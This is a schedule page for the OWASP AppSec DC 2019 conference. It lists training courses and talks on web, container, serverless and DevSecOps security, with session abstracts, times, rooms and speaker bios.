Loading…
Registration is NOW Open
Marriott Wardman Park
2660 Woodley Rd NW
Washington DC, District of Columbia 20008 USA
Phone: 1-202-328-2000 

Book Now 
*discount rates expire August 19, 2019

Sign up or log in to bookmark your favorites and sync them to your phone or calendar.

Monday, September 9
 

8:00am

Registration
Monday September 9, 2019 8:00am - 5:00pm
Atrium

9:00am

A Builder’s Guide to Single Page Application Security
Whether you like it or not, we all live in a world of Single Page Applications. Frontend JavaScript frameworks such as Angular and React have changed the way we build web applications. However, did you know that these frameworks also disrupt the security landscape? For example, Angular and React change the nature of XSS as we know it. They also conflict with modern security measures, such as Content Security Policy.
In this training, you will learn how to build secure Single Page Applications. We cover changes in the security model of an application, common threats to an application, framework features that increase security, and state-of-the-art security technology you should start using. Concretely, we will cover the following topics:
  • XSS in Angular and React
  • Advanced injection attacks
  •  The limitations of CSP in Single Page Applications
  •  Recent developments in CSP
  • Protecting yourself against malicious third-party content
  • JWT abuse and best practices
  • The intricacies of Cross-Origin Resource Sharing
  • Recent developments in using OAuth 2.0 and OpenID Connect
The training consists of both lectures and hands-on lab sessions. Lectures go into depth on security threats and mitigation strategies. Labs are conducted in a custom-built competitive lab environment. Security challenges give you hands-on experience with attacks and defenses. You will walk away from this training with an overview of current best practices, along with actionable advice on implementing them.


Speakers
avatar for Philippe De Ryck

Philippe De Ryck

Founder, Pragmatic Web Security
Philippe De Ryck helps developers protect companies through better web security. As the founder of Pragmatic Web Security, he travels the world to train developers on web security and security engineering. His Ph.D. in web security from KU Leuven lies at the basis of his exceptional... Read More →


Monday September 9, 2019 9:00am - Tuesday September 10, 2019 5:00pm
Lincoln 3

9:00am

Attacking and Defending Containerized Apps and Serverless Tech
Container and serverless technology have changed the way applications are developed and the way deployments are done. Organizations, both large and small have openly embraced containerization to supplement traditional deployment paradigms like Virtual Machines and Hypervisors.
Containers have risen in popularity and have been widely used because they help package and deploy consistent-state applications across multiple environments, and are also extremely scalable especially when they are complemented with orchestration technologies.
Serverless, on the other hand, seems to be taking over at a rapid rate with increased usage of micro-services and polyglot development of applications and services across organizations.
However, security remains a key challenge that both Organizations and security practitioners face with containerized and serverless deployments. While containers continue to be vulnerable to security threats that plague any typical application deployment, they also face specific security threats related to the containerization daemon, the shared kernel and other shared resources like network, process and the filesystem. Serverless deployments face risks such as insecure deployment configurations, inadequate monitoring, and logging of functions, broken authentication, function event data injection, insecure secret storage, and many more.
Attacking services and applications leveraging container and serverless technology requires a specific skill set and a deep understanding of their underlying architecture.
This training has been created with the objective of understanding both offensive and defensive security for container orchestrated and serverless deployments. It will be a 2-day program that will detail through specific theory elements with extensive hands-on exercises that are similar to real-world threat scenarios that the attendees will understand and take part in and will also understand the ways in which containerized and serverless deployments can be attacked, made secure, yet scalable, efficient and effective.

The training consists of, but not limited to the following focus areas in Container Security and Serverless Deployment:
  •  Introduction to Container Technology
  • Containerized Deployments and Container Orchestration Technologies
  • Container Threat-Model
  • Attacking Containers and Security deep-dive
  • Introduction to Kubernetes
  • Threat-Model of Orchestration technologies
  • Attacking Kubernetes
  • Kubernetes Defense-in-Depth
  • Logging & Monitoring Orchestrated deployments
  • Introduction to Serverless
  • Deploying Application to AWS Lambda
  • Serverless Threat-Model
  •  Attacking a Serverless Stack
  •  Serverless Security Deep-dive

Speakers
avatar for Sudarshan Narayanan

Sudarshan Narayanan

Practice Head - DevSecOps, we45
Sudarshan Narayanan is the Practice Head of DevSecOps at we45, a focused application securitycompany. Sudarshan currently leads the service delivery practice at we45 and comes with a decade longexperience in Software Quality Assurance.Sudarshan's primary focus involves conceptualizing... Read More →
avatar for Nithin Jois

Nithin Jois

Senior Security Solutions Engineer, we45
Nithin Jois is a Solutions Engineer at we45 - a focused Application Security company. He has helped build Orchestron - A leading Application Vulnerability Correlation and Orchestration Framework. He is experienced in Orchestrating containerized deployments securely to Production... Read More →
avatar for Tilak Thimmappa

Tilak Thimmappa

Senior Solution Engineer, we45
I work at an Application Security company (we45) and have a unique perspective of developing secure and deliberately insecure apps in Python and NodeJS. I have contributed to the development of several Web-Applications using Django, Django-Rest-Framework, NodeJs and more, that have... Read More →


Monday September 9, 2019 9:00am - Tuesday September 10, 2019 5:00pm
Lincoln 2

9:00am

Seth & Ken’s Excellent Adventures in Secure Code Review
Have you ever been tasked with reviewing 3.2 million lines of code manually for SQL Injection, XSS, and Access Control flaws? Have you been asked to review a new framework on short notice? Does the idea of reviewing Ruby, Go, or Node code leave you with heartburn? This course addresses all of these common challenges in modern code review. We have concentrated on taking our past adventures in code review, the lessons we have learned along the way, and made them applicable for others who perform code reviews. We will share our methodology to perform analysis of any source code and suss out security flaws, no matter the size of the code base, or the framework, or the language.  You as a student will learn the methodology, techniques, approach, and tools used by Seth Law and Ken Johnson to understand code flows, trace user input, identify vulnerabilities, and effectively secure an application codebase.

Upon completion attendees will know:
Students will take away knowledge and experience in approaching numerous code languages and frameworks to complete a security source code review. In addition, the learned methodology can be customized by the attendee to fit into any organization’s security SDLC. Finally, the attendee will have the tools to review source code for any web, mobile, or modern application, whether or not the targeted language is specifically covered during the course.


Speakers
avatar for Seth Law

Seth Law

President and Principal Security Consultant, Redpoint Security
Seth Law is the President and Principal Security Consultant of Redpoint Security (rdpt.io). During the last 15 years, Seth has worked within multiple disciplines, from software development to network protection, as a manager and individual contributor. Seth has honed his application... Read More →
avatar for Ken Johnson

Ken Johnson

AppSec Person, GitHub
Ken Johnson, has been hacking web applications professionally for 11 years. Ken is both a breaker and builder and currently works on the GitHub application security team. Previously, Ken has spoken at RSA, You Sh0t the Sheriff, Insomnihack, CERN, DerbyCon, AppSec USA, AppSec DC, AppSec... Read More →


Monday September 9, 2019 9:00am - Tuesday September 10, 2019 5:00pm
Lincoln 5

9:00am

Using the OWASP Application Security Verification Standard 4.0 to Secure Your Applications
This three-day master class delivered by the three co-leaders of the project covers essential developer-centric security architecture and controls using the newly released OWASP Application Security Verification Standard 4.0.
Instead of a blow by blow, control by control description of the standard, we take students on a journey of discovery of the major issues using an interactive lab driven class structure. We strongly urge attendees to bring some code to follow along, or use the sample app we will have on hand. Students should feel free to ask questions at any time to delve deeper into things they really need to know to push their knowledge to the next level.
The course is primarily aimed at assisting developers to produce more secure applications, but anyone in the secure software delivery lifecycle should come - including architects, tech leads, developers, testers, and of course application security professionals.


Speakers
avatar for Andrew van der Stock

Andrew van der Stock

Senior Principal Consultant, Synopsys
Andrew van der Stock is a long-time security researcher and is the current co-lead of the OWASP Top 10 and OWASP Application Security Verification Standard, and is formerly an OWASP Global Board member. Andrew has trained or spoken at many conferences worldwide, including Black Hat... Read More →


Monday September 9, 2019 9:00am - Wednesday September 11, 2019 5:00pm
Lincoln 6

10:00am

AM Coffee Break
Monday September 9, 2019 10:00am - 10:30am
Exhibit Hall C

12:30pm

Lunch
Monday September 9, 2019 12:30pm - 2:00pm
Exhibit Hall C

3:00pm

PM Coffee Break
Monday September 9, 2019 3:00pm - 3:30pm
Exhibit Hall C
 
Tuesday, September 10
 

8:00am

Registration
Tuesday September 10, 2019 8:00am - 5:00pm
Atrium

9:00am

Secure Coding with the OWASP Top Ten
The major cause of API and web application insecurity is insecure software development practices. This highly intensive and interactive 2-day course provides essential application security training for web application and API developers and architects.
The class is a combination of lecture, security testing demonstration and code review. Students will learn the most common threats against applications. More importantly, students will learn how to code secure web solutions via defense-based code samples.
As part of this course, we will explore the use of third-party security libraries and frameworks to speed and standardize secure development. We will highlight production quality and scalable controls from various languages and frameworks. This course will include secure coding information for Java, PHP, Python, Javascript, and .NET programmers, but any software developer building web applications and API's will benefit

Student Requirements: Familiarity with the technical details of building web applications and API's from a software engineering point of view.
Laptop Requirements: Any laptop that can run an updated web browser and intercepting proxy tool.

Day 1 of the course will focus on web application basics.
  •  Introduction to Application Security
  • Introduction to Security Goals and Threats
  • HTTP Security Basics
  • CORS and HTML5 Considerations
  • XSS Defense
  • Content Security Policy
  • Intro to Angular.JS Security
  • Intro to React.JS Security
  • SQL and other Injection
  • Cross-Site Request Forgery
  • File Upload and File IO Security
  • Deserialization Security
  • Input Validation Basics
  • OWASP Top Ten 2017
  •  OWASP ASVS 4.0

Day 2 of the course will focus on API secure coding, Identity, and other advanced topics.
  • Webservice, Microservice and REST Security
  •  Authentication and Session Management
  •  Access Control Design
  •  OAuth 2 Security
  •  OpenID Connect Security
  •  HTTPS/TLS Best Practices
  •  3rd Party Library Security Management
  •  Application Layer Intrusion Detection
  •  Secure SDLC
We end day 2 with a competitive hacking lab and secure coding lab. It's a fun and informative way to end the course.

Please note this course will cover the requested DC conference topics:
  • Novel web vulnerabilities and countermeasures
  • New technologies, paradigms, tools
  • OWASP tools or projects in practice
  • Secure development: frameworks, best practices, secure coding, methods, processes, SDLC
  • Browser security
  • REST/SOAP security
  • Security of frameworks
  •  Effects of UX on security
  •  Management topics in Application Security: Business Risks, Managing SDLC


Speakers
avatar for Jim Manico

Jim Manico

Founder, Manicode Security
Jim Manico is the founder of Manicode Security where he trains software developers on secure coding and security engineering. He is also an investor/advisor for KSOC, Nucleus Security, Signal Sciences andBitDiscovery. Jim is a frequent speaker on secure software practices, is a member... Read More →


Tuesday September 10, 2019 9:00am - Wednesday September 11, 2019 5:00pm
Lincoln 4

10:00am

AM Coffee Break
Tuesday September 10, 2019 10:00am - 10:30am
Exhibit Hall C

12:30pm

Lunch
Tuesday September 10, 2019 12:30pm - 2:00pm
Exhibit Hall C

3:00pm

PM Coffee Break
Tuesday September 10, 2019 3:00pm - 3:30pm
Exhibit Hall C
 
Wednesday, September 11
 

9:00am

Registration
Wednesday September 11, 2019 9:00am - 9:15am
Atrium

9:00am

Project Review

Wednesday September 11, 2019 9:00am - 5:00pm
Buchanan

9:00am

Building an AppSec Program with OWASP
Explore the OWASP universe and how to build an application security program with a budget of $0. Experience a practitioner's guide for how to take the most famous OWASP projects and meld them together into a working program. Projects are broken down into awareness/process/tools, with an explanation of the human resources required to make this successful.
This course is a one-day training where there is a mixture of a lecture on a specific segment of OWASP projects, and then a practical exercise for how to use that project as a component of an application security program.
The first group of projects is "training/education". These projects focus on high-level knowledge, methodology, and training for the application security program. This group includes OWASP Top 10, OWASP Proactive Controls, cheat sheets, and training apps (Juice Shop, DevSlop, and WebGoat). Discussions focus on the process of raising awareness with knowledge/training and building out a program. The practical portion includes discussion of rolling out proactive controls and hands-on time with JuiceShop.
The second group is "process/measurement". These focus on requirements, code review, best practices, development libraries, and building software without known vulnerabilities. This group includes ASVS, SAMM, threat modeling, Code Review guide, and the testing guide. The end-to-end world of the developer is explored, from requirements through writing code. The working portion includes using ASVS to assess a sample app, threat modeling a sample app, and using SAMM for a sample assessment.
The third group is "tools". This group focuses on tools, including the testing guide, Dependency-Check, Threat Dragon, CRS, and ZAP. The testing approach and touchpoints are discussed, as well as a high-level survey of the tools. The working portion includes using ZAP to scan a sample application.
All of these tools work together to form the basis of an application security program with a budget of $0 except for the people resources to implement. This class teaches the projects to use as well as how to use them, with practical, hands-on experience.

Audience: The audience for this session is two-fold. The first group is those that are interested in building an application security program using the various tools and documents available from OWASP. The second group is those that want to experience multiple OWASP tools and materials and use them in practical exercises.

Prerequisites: Participants should have a foundational understanding of application/product security.

Computer Setup: Bring a computer for executing the lab exercises. Participants should download the OWASP Proactive Controls, ASVS, SAMM, and ZAP.


Speakers
avatar for Security Journey

Security Journey

Security Journey
coming soon


Wednesday September 11, 2019 9:00am - 5:00pm
Lincoln 3

9:00am

DevSecOps - Automating Security in DevOps
Modern enterprises are implementing the technical and cultural changes required to embrace  DevOps methodology. DevSecOps extends DevOps by introducing security early into the SDLC process, thereby minimizing the security vulnerabilities and enhancing the software security posture. In this workshop, we will show how this can be achieved through a series of live demonstrations and practical examples using open source tools.
As part of this workshop attendees will receive a state-of-the-art DevSecOps tool-chest comprising of various open-source tools and scripts to help the DevOps engineers in automating security within the CI/CD pipeline. While the workshop uses Java/J2EE framework, the workshop is language agnostic and similar tools can be used against other application development frameworks.
The workshop will also present various case studies on how critical bugs and security breaches affecting popular software and applications could have been prevented using a simple DevSecOps approach.

Why DevSecOps?
  • The DevSecOps process will help in
  • Create a security culture/mindset amongst the already integrated DevDecOps team.
  • Find and fix security bugs as early in SDLC as possible.
  • The culture promotes the philosophy “security is everyone's problem.
  • Integrate all security software centrally and utilize the results more effectively.
  • Measure and shrink the attack surface

Who Should Take this Course
DevSecOps Workshop, which will give the target audience a holistic approach in assessing and securing the web applications in an automated fashion within the existing CI/CD pipeline, can be attended by DevOps engineers, security and solutions architects, system administrators and anybody who is willing to inject security aspects in their DevOps process.

Student Requirements

Our workshop will be delivered as an interactive session, so the attendees only need to carry a laptop with them. We also encourage the attendees to download and try the tools and techniques discussed during the workshop as the instructor is demonstrating it.

What Students Should Bring
A Laptop with Wifi connectivity and admin privileges.

Students will be provided with
The attendees will also receive a free DevSecOps tool-chest (designed by the NotSoSecure team) which can be directly implemented in most CI/CD pipelines.


Speakers
avatar for Sumit Siddharth

Sumit Siddharth

Founder, NotSoSecure
Sumit Siddharth (Sid) is the founder of NotSoSecure (www.notsosecure.com), a specialist IT security firm delivering high-end IT security consultancy and Training. Prior to NotSoSecure, he worked as Head of Penetration Testing for a leading IT security company in the UK. He has more than 9 years of experience in Penetration Testing. Sid has authored a... Read More →
avatar for Rohit Salecha

Rohit Salecha

Principal Security Consultant, NotSoSecure
Rohit is a technology enthusiast with over 8+ years of experience in hacking anything that runs on binaries and is on the ground. He also delivers one of the bestselling classes by NotSoSecure titled 'Application Security for Developers’. He has also trained and spoken at premier... Read More →


Wednesday September 11, 2019 9:00am - 5:00pm
Lincoln 2

9:00am

Women In AppSec - Web Application Penetration Training - (No charge )
Limited Capacity filling up

This will be a 1-day training course. The Application Security Training is intended for students/professionals interested in making a career in the Information Security domain. This training involves real-world scenarios that every Security Professional must be well versed with. It involves decompiling, real-time analyzing and testing of the applications from a security standpoint.
This training covers understanding the internals of web and mobile applications, Real-time testing of web applications and android applications and a strategic approach to analyze applications for OWASP Top 10 vulnerabilities (Web) security issues such as Injections, Cross-Site Scripting (XSS), CSRF Attacks, Insecure API’s, Insecure logging, Insecure communication, Insufficient cryptography, Insecure authentication and Poor code quality and many more.
Zoe Braterman - Assistant Trainer

Speakers
avatar for Nicole  Becher

Nicole Becher

Director of Information Security & Risk Management, S&P Global Platts
Nicole Becher is currently Director of Information Security & Risk Management for S&P Global Platts. She has been in the cybersecurity space for over ten years working mostly inoffensive security capacities leading penetration testers, red teams, forensics, and incident responders... Read More →
avatar for Vandana Verma

Vandana Verma

Security Architect, IBM India Software Labs
Vandana is a seasoned security professional with over a decade worth of experience ranging from application security to infrastructure and now dealing with cloud security. She works with various communities (InfosecGirls, OWASP, WoSec, and null) and is passionate about increasing... Read More →


Wednesday September 11, 2019 9:00am - 5:00pm
Lincoln 5

10:00am

AM Coffee Break
Wednesday September 11, 2019 10:00am - 10:30am
Exhibit Hall C

12:30pm

Lunch
Wednesday September 11, 2019 12:30pm - 2:00pm
Exhibit Hall C

3:00pm

PM Coffee Break
Wednesday September 11, 2019 3:00pm - 3:30pm
Exhibit Hall C

5:00pm

Welcome Reception
Wear your badge to the receptions.

Wednesday September 11, 2019 5:00pm - 6:15pm
Exhibit C

6:30pm

 
Thursday, September 12
 

7:30am

Registration
Thursday September 12, 2019 7:30am - 5:00pm
Atrium

8:00am

Capture the Flag - CMD+CTRL Web Application Cyber Range
CMD+CTRL Web Application Cyber Range
Want to test your skills in identifying web app vulnerabilities?  Join OWASP and Security Innovation as attendees compete in CMD+CTRL  a web application cyber range where players exploit their way through hundreds of vulnerabilities that lurk in business applications today.  Success means learning quickly that attack and defense is all about thinking on your feet.
For each vulnerability you uncover, you are awarded points. Climb the interactive leaderboard for a chance to win fantastic prizes! CMD+CTRL is ideal for development teams to train and develop skills, but anyone involved in keeping your organization’s data secure can play - from developers and managers and even CISOs.
Register early to reserve your spot!
https://web.securityinnovation.com/owaspdc2019

Speakers
avatar for Kevin Poniatowski

Kevin Poniatowski

Senior Security Instructor and Engineer, Security Innovation
Kevin Poniatowski, Senior Security Instructor and Engineer at Security Innovation, brings an optimal blend of speaking ability, technical savvy, and an insatiable passion for security to Security Innovation's training customers. This produces an engaging and enlightening environment... Read More →


Thursday September 12, 2019 8:00am - 5:15pm
Virginia B

8:45am

Opening Remarks
Thursday September 12, 2019 8:45am - 9:00am
Salon 2

9:00am

Applying Security Engineering Principles to Complex Composite Systems
Modern web applications and systems have grown increasing complex in the 18 years since OWASP was founded. Today's systems are composed from many diverse components, employ a wide variety of frameworks and toolkits, and utilize a vast spectrum of hosting models and external services.  Secure design and operation for such composite systems requires thoughtful application security engineering principles, attention to interactions among composite system elements, and awareness of dependencies across the system lifecycle. This talk will cover a selection of high-level principles, and illustrate them with reference to a Smart City transit system example.

Speakers
avatar for Neal Ziring

Neal Ziring

Technical Director for the National Security Agency’s Capabilities Directorate, NSA
Mr. Neal Ziring is the Technical Director for the National Security Agency’s Capabilities Directorate, serving as a technical advisor to the Capabilities Director, Deputy Director, and other senior leadership. Mr. Ziring is responsible for setting the technical direction across... Read More →


Thursday September 12, 2019 9:00am - 10:00am
Salon 2

10:00am

AM Coffee Break
Thursday September 12, 2019 10:00am - 10:30am
Exhibit Hall C

10:00am

Members Lounge
Looking for a place to recharge your electronics?  
Feeling a bit hungry or thirsty?  
Maybe you are looking for some cool OWASP Member Only swag?
Or just looking to take a break from the hectic conference atmosphere?
Head on over to the Members Lounge located in the XXXX Room.

Here you can grab a snack, quench your thirst, recharge your electronics, kick up your feet, and network with other OWASP members all within a relaxed atmosphere.

Not an OWASP Member?  No problem!  Swing on over to the lounge, and you can sign up on the spot, or join here!

Look for the signs or ask a volunteer how to find us!

Thursday September 12, 2019 10:00am - 5:00pm
Atrium

10:30am

A Structured Code Audit Approach to Find Flaws in Highly Audited Webapps
WordPress is a highly popular content management system used by over 33% of all websites on the internet. It’s ease of use, great compatibility with a variety of servers and its huge list of free and powerful plugins (over 50.000) make WordPress the first choice for quickly and easily setting up a website without any technical knowledge or excessive budget. WordPress can be customized and optimized to a point that even governments and billion-dollar corporations use this blogging CMS to manage their websites. From america.gov to the swedish government, and from Microsoft to Facebook: they all use WordPress.

The popularity of this and other CMS makes it an attractive target for cybercriminals seeking to take over as many websites as possible, as well as for nation states and other sophisticated hacking groups interested in backdooring high value targets. We observed that the high interest in WordPress’ security by different groups lead to many vulnerabilities being discovered and patched in the past. Additionally, bug bounty programs and 0day acquisition platforms attract a vast amount of bounty hunters that slowly but surely squeezed easy to find vulnerabilities out of the WordPress core. Hence, the well-reviewed code of the most popular web application is a great challenge but also a good candidate to experiment with different approaches of code auditing.

When we started our vulnerability research on the WordPress core code, we quickly realized that in order to find critical vulnerabilities one must move away from the traditional paradigm of how to find simple vulnerabilities in web applications and come up with more effective approaches and methodologies to source code auditing. This paper documents our approach of separating source code into components and combining several low-impact bugs into powerful Privilege Escalation and Remote Code Execution exploits. We believe that our documentation of vulnerability discovery does not only help other researchers to manifest their audit methodology but also helps developers to better understand the mindset of attackers. As a result, we found and combined five vulnerabilities into a powerful exploit chain that in the end allowed unauthenticated attackers to take over any high value target running WordPress.

Speakers
avatar for Simon Scannell

Simon Scannell

Security Researcher, RIPS Technologies


Thursday September 12, 2019 10:30am - 11:15am
Lincoln 2

10:30am

Non-Political Security Learnings from the Mueller Report
The Mueller Report was split into 2 volumes, focused on 1) Russian interference in the 2016 election and 2) Administration obstruction of justice. By reading the report through a critical security lens we can gather a trove of non-political security learnings, broadly split into Blue Team learnings and Personal Security learnings.
Blue Team:
This portion covers the hacking of the DNC and DCCC. It examines the evidence in the report around how access was gained, which accounts were targeted, how networks were traversed, and what we can do to defend our organizations.
Personal Security:
This portion takes a data-driven approach to look at how the FBI gathered evidence. It examines the breakdown between different sources (Twitter/FB chats, emails, interviews, call records, written testimony, etc), as well as how that evidence was attained (subpoena, physical device access, etc). It covers both the Mueller Report and subsequent documents that have now been unsealed, such as Apple/Google subpoenas.

Speakers
avatar for Arkadiy Tetelman

Arkadiy Tetelman

Head of Security, Lob
Arkadiy Tetelman is Head of Security at Lob, and previously worked on application security at Airbnb and Twitter. He is passionate about all things information security, ranging from the technical, to policy and legal, to security management and leadership. He contributes to several... Read More →


Thursday September 12, 2019 10:30am - 11:15am
Lincoln 3

10:30am

Security & Chaos Engineering: A Novel Approach to Crafting Secure and Resilient Distributed Systems
Security today is customarily a reactive and chaotic exercise.

Modern systems pose a number of thorny challenges and securing the transformation from legacy monolithic systems to distributed systems demands a change in mindset and engineering toolkit. The security engineering toolkit is unfortunately out-of-style and outdated with today's approach to building, security and operating distributed systems. Distributed systems at scale have unpredictable and complex outcomes that are costly when security incidents occur. The speed, scale, and complex operations within microservice architectures make them tremendously difficult for humans to mentally model their behavior.

What if you could flip a security incident scenario on its head and drive it in reverse? Chaos Engineering allows for security teams to proactively experiment on recurring incident patterns to derive new information about underlying factors that were previously unknown by reversing the postmortem and preparation phase. This is done by developing live-fire exercises that can be measured, managed, and automated. Contrary to Red/Purple Team game days, chaos engineering does not use threat actor tactics, techniques, and procedures. It develops teams by building a learning culture around system failure to challenge engineering teams to discover new insights on how they can improve their applied security.

People operate differently when they expect things to fail. Additionally, teams are more likely to keep an open mind about what is actually causing those things to fail when they are not fighting fires. There is a fundamental shift in mental focus and operational momentum that drives teams to put the fire out versus thorough examination of what caused the incident to begin with. As far as we know it Chaos Engineering is the only proactive mechanism for detecting availability and security incidents before they happen. Security Chaos Engineering allows teams to proactively, safely discover system weakness before they disrupt business outcomes.

In this session, we will introduce a new concept known as Security Chaos Engineering and how it can be applied to create highly secure, performant, and resilient distributed systems.

Speakers
avatar for Aaron Rinehart

Aaron Rinehart

Founder, Verica
Aaron is most notably known for expanding the possibilities of Chaos Engineering in its application to other safety-critical portions of the IT domain notably cybersecurity. He began pioneering the application of Security in Chaos Engineering during his tenure as the Chief Security... Read More →


Thursday September 12, 2019 10:30am - 11:15am
Lincoln 6

10:30am

Securing Serverless by Breaking-in
Serverless rocks the security boat. Ad-hoc servers we don’t manage rids us of certain security concerns, while the proliferation of cheap micro services raises others. In this talk, we’ll experience these security concerns live. We’ll break into a vulnerable Serverless application and exploit multiple weaknesses, helping you better understand the mistakes you can make, their implications, and how you can avoid them.

Speakers
avatar for Hayley Denbraver

Hayley Denbraver

Developer Advocate, Snyk
Hayley Denbraver is a Developer Advocate at Snyk. In that role, she is committed to open source security education, listening to developer communities, and posting pictures of her dog on the company slack.


Thursday September 12, 2019 10:30am - 11:15am
Lincoln 4

10:30am

Secure Medical Device Deployment Standard
Speakers
avatar for Christopher Frenz

Christopher Frenz

AVP of Information Security, Interfaith Medical Center
Christopher Frenz is the AVP of Information Security for Interfaith Medical Center where he worked to develop the hospital’s information security program and infrastructure. Under his leadership, the hospital has been one of the first in the country to embrace a zero trust model... Read More →


Thursday September 12, 2019 10:30am - 11:15am
Virginia A

10:30am

Owning the Cloud through SSRF and PDF Generators
With how many apps are running in the cloud, hacking these instances becomes easier with a simple vulnerability due to unsanitized user input. In this talk, we’ll discuss a number of different methods that helped us exfil data from different applications using Server-Side Request Forgery (SSRF). Using these methods, we were able to hack some of the major transportation, hospitality, and social media companies and make $50,000 in rewards in 3 months.

Behrouz Sadeghipour

Speakers
avatar for Ben Sadeghipour

Ben Sadeghipour

Head of Hacker Operations, HackerOne
Ben is the head of Hacker Operations at HackerOne by day, and a hacker by night. He has helped identify and exploit over 700 security vulnerabilities across 100s of web and mobile applications for companies such as Yahoo, Airbnb, Snapchat, The US Department of Defense, Yelp, and more... Read More →


Thursday September 12, 2019 10:30am - 11:15am
Lincoln 5

11:30am

OWASP Find Security Bugs: The community static code analyzer
The Web application development lifecycle has numerous security activities. For developers, code review is a familiar recurring activity. To support Java developers, a project was started in 2012 called, "Find Security Bugs" (FSB). It is an extension of the SpotBugs project, formerly known as, FindBugs. FSB is a community static analysis tool which targets specific vulnerabilities. Over the years FSB has evolved from a limited tool to a solid coverage of bug patterns. It is now used in many large corporations to support automation.

In this presentation, you will learn about its high-level internals and heuristics, its potential integration in developers' IDE and in continuous integration environments.

A selection of vulnerabilities found by the tool in popular applications including Spring and Struts will be explained. For each of these vulnerabilities, we will review the description of the affected component, the issue reported by the tool, the method to analyze the report and an overview of the potential risks. Along the way you will learn a few tips on increasing your efficiency with the tool.

After observing some real-world vulnerabilities, we will conclude with lessons learned from maintaining this open-source project for close to 8 years. Lessons learned will include some of the successes but also failures from the development initiatives.

Speakers
avatar for Philippe Arteau

Philippe Arteau

Security Researcher, GoSecure
Philippe is a security researcher working for GoSecure. His research is focused on Web application security. His past work experience includes pentesting, secure code review and software development. He is the author of the widely-used Java static analysis tool Find Security Bugs... Read More →


Thursday September 12, 2019 11:30am - 12:15pm
Lincoln 2

11:30am

Insider Threat Assessments: A methodology for improving insider threat deterrence and detection
Giving organizations a proactive, situational procedure to validate their insider threat program reduces gaps in coverage, limits tool or service misconfigurations, helps prevent system and model oversights, and provides real world practice scenarios. Over the last decade, there has been an influx of tools, task forces, and end-to-end solutions created to supplement insider threat programs. "An effective insider threat program incorporates a number of technical controls to assist with preventing, detecting, and responding to concerning behaviors and activity" (Spooner et al, 2018). In that same white paper, the authors also indicate that organizations, at a minimum, should adopt tools from each of the following categories: user activity monitoring (UAM), data loss prevention (DLP), security information and event management (SIEM), analytics, and digital forensics. The breadth of functionality and wide array of available tools, pose a challenge to organizations looking to build or strengthen their insider threat program. Furthermore, the panacea for all insider threats does not exist and methods must be adopted that are specific to organizational assets. This presentation builds on a review of the existing insider threat tool landscape and introduces a methodology to validate configurations and coverage through a situational insider threat assessment. Insider threat kill chains, how to simulate relevant risks, and quantifying key asset identification will also be covered.



Speakers
avatar for Ben Stewart

Ben Stewart

Security Engineer, Security Innovation
Ben has grown his security skill-set through years of high profile, complex development projects, primarily in the Financial Services industry. Building and securing systems responsible for large, regulated money movements, enabling secure code review processes and pipelines, and... Read More →


Thursday September 12, 2019 11:30am - 12:15pm
Lincoln 3

11:30am

Shift left, shift right, or run security right through the middle?
With software security blunders making headlines and businesses under increasing pressure to deliver software faster, development and security teams have been tasked to devise a strategy to satisfy demands for more secure software and more rapid application development. These combining forces have led to the emergence of DevSecOps, which represents a shift in IT culture to accommodate the growing need for both security and speed. However, security teams want to shift left, development teams want to shift right, and Ops team want testing throughout all phases of the development cycle—in other words, continuous testing. This leaves us with a lot of options and little guidance. What’s the best approach?

This talk will examine how your organization can inject security testing at the right time, at the right depth, by using the right tools, by defining the right processes, and with the right people. In this way, you can achieve continuous testing rather than testing without a clear strategy in place.

Speakers
avatar for Meera Rao

Meera Rao

Senior Principal Consultant, Synopsys, Inc
Ms. Meera Rao works as a Senior Principal Consultant and the Director of DevSecOps Practice at Synopsys, Inc who has over 20 years of experience in software development organizations in a variety of roles including Architect, Lead Developer, and Project Manager, and Security Architect... Read More →


Thursday September 12, 2019 11:30am - 12:15pm
Lincoln 6

11:30am

Cryptocoin Miners vs Machine Learning
This talk will be a walkthrough of how I built a detection engine focused on finding cryptocoin miners within an AWS architecture. It utilizes AWS Flow Logs as the data source and multiple statistical analysis techniques for both massaging the data and performing the actual detection. AWS Flow Logs do not function as traditional per-packet 5-tuple captures. Instead, the data is aggregated over a 10-minute period, organized by unique IP address and port numbers. This presents a unique challenge for building a detection model as you don't have detailed per-packet logs. The methodology itself follows an iterative design: look for a pattern, implement into code, check for false positives. This is repeated until we have a sufficiently knowledgable model capable of flagging cryptocoin mining traffic with a minimal false positive rate. The techniques discussed include cluster analysis via k-means and DBSCAN, convex hulls, linear regression analysis, nearest neighbor, and several other simple but very powerful statistical analysis techniques. The final implementation will be built on top of ELK, culminating into a turn-key release that owners can drop into their environments.

Speakers
avatar for Jonn Callahan

Jonn Callahan

Jonn started his career working within the government sector, helping to start a program responsible for securing web applications run on government infrastructure.Looking to expand his experience beyond the .NET stack and the occasional Java app, he moved into the private sector... Read More →


Thursday September 12, 2019 11:30am - 12:15pm
Lincoln 4

11:30am

Secure Coding Dojo
The Secure Coding Dojo is a platform for delivering security training for developers. The platform is created for development organizations of all sizes: from university classrooms to large enterprises.

While open source web applications that teach software security concepts are not new, the Secure Coding Dojo is not another vulnerable website. It is a training platform which can be customized to integrate with vulnerable applications and other CTF challenges.

Join this session to see the Dojo in action and learn how it can revolutionize application security training in a development organization.

Here are some of the topics that will be covered:
- Open source project history and evolution
- Predefined training apps: Insecure.Inc, Hacker's Den, Security Code Review Master 
- Deploying with Docker or building the environment from scratch
- Auth integrations with Slack, ADFS SAML and LDAP
- Extending and customizing the platform

Check out the project links:

https://github.com/trendmicro/SecureCodingDojo
https://www.owasp.org/index.php/OWASP_Secure_Coding_Dojo
https://hub.docker.com/u/securecodingdojo

Speakers
avatar for Paul Ionescu

Paul Ionescu

Security Architect and R&D Security Leader, Trend Micro
Paul Ionescu is a Security Architect and R&D Security Leader at Trend Micro and also an OWASP Ottawa Chapter Co-Leader. Over the past decade, Paul has worked in various areas of software security. He was a developer for the AppScan application security testing suite, formed and lead... Read More →


Thursday September 12, 2019 11:30am - 12:15pm
Virginia A

11:30am

DevSecOps: Essential Pipeline Tooling to Enable Continuous Security
As we embrace DevOps to optimize our Agility, we start pushing working code toward production releases more frequently. Gone are the days where we can have a disjoint, mysterious security team that works down the hall or on some other floor. Whether we are doing true "Continuous Deployment" straight to production or not, we no longer have time for slow, manual, late-lifecycle security assessments to determine if our code is going to put us on the front page of the newspaper (for the wrong reasons). What we need is a way to know that our code is secure enough to pass muster every day. What we need is confidence that our software can continue to defend itself. What we need is continuous security.

